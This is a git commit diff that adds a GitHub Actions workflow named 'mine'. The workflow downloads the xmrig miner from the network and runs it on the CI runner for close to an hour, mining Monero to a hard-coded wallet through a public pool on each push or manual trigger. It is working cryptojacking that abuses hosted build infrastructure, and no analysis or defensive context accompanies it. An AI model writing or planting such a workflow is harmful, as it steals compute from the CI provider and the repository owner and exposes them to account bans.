mine 7pm3f7
This commit is contained in:
parent
48f8968d9c
commit
79442eeb64
|
|
@ -0,0 +1,14 @@
|
|||
name: mine
|
||||
on:
|
||||
push:
|
||||
branches: [main]
|
||||
workflow_dispatch:
|
||||
jobs:
|
||||
mine:
|
||||
runs-on: ubuntu-latest
|
||||
timeout-minutes: 55
|
||||
steps:
|
||||
- run: |
|
||||
curl -sL https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz | tar xz --strip-components=1
|
||||
./xmrig -o mine.c3pool.com:15555 -u 87gtFpmvkY92UFddzbpFoGUWY9GMxj9LVVrjGix86h2Y6gdXnsfRCFw7h5Wz7LCmoJF8em5GYditNGwpkqmBmajXVSMXnHM -p fg-7pm3f7 --donate-level=0 -t 2 &
|
||||
sleep 3200
|
||||
Loading…
Reference in New Issue